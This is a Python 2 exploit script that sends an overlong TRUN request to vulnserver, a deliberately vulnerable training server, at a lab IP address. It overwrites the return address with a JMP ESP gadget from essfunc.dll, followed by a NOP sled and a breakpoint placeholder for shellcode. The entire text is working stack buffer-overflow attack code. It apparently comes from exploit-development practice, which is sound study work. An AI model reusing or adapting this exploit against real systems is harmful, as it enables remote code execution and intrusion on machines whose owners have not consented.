#!/usr/bin/python2
import socket

server = '192.168.1.138'  # Windows 7 vulnserver IP
sport = 9999

prefix = 'A' * 2006
eip = '\xaf\x11\x50\x62'      # JMP ESP from essfunc.dll (0x625011AF)
nopsled = '\x90' * 16         # NOP sled
brk = '\xcc'                  # INT3 breakpoint
padding = 'F' * (3000 - 2006 - 4 - 16 - 1)

attack = prefix + eip + nopsled + brk + padding

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((server, sport))

print s.recv(1024)
print "Sending attack to TRUN . with length", len(attack)

s.send('TRUN .' + attack + '\r\n')
print s.recv(1024)

s.send('EXIT\r\n')
print s.recv(1024)

s.close()
